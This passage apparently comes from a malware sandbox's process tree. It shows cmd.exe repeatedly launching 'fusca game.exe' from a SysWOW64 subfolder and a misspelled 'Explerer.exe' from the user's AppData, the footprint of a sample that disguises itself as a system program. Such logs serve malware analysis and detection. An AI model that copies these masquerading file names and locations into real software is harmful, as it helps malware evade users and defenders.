1⤵
PID:1032
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6940
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7944
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7416
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7504
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7828
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8116
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7048
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7216
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5904
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:1172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6576
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6156
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7928
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:1124
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:1372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7228
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6996
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2128
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7948
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7068
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7968
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6992
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6928
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6608
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2248
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:1508
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:2352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6896
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:1520
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8140
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8088
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6284
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2348
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6360
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6884
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6704
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7288
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6820
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6616
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5420
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:1864
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6948
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7768
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8160
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:2932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7940
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:4352
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2172
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6428
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:2956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3956
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6300
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:1464
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6920
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5428
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6700
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5076
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6688
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:4212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8016
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7872
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6500
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7172
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3924
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8084
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:4036
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:1884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3724
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7564
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7368
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5716
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6812
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8404
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8412
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8508
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8516
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8820
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:9032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8828
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:9008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8900
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:9068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8908
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:9044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7192
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8360
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7644
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8436
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8800
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7788
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8836
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3064
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7284
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:9172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6596
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:9164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6676
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:2344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:9196
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8460
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7264
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3948
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8096
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7980
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:4984
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:2336
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8060
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8248
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8264
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8312
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6632
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6584
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8676
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8476
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8484
- C:\Users\Admin\AppData\Roaming\Explerer.exe
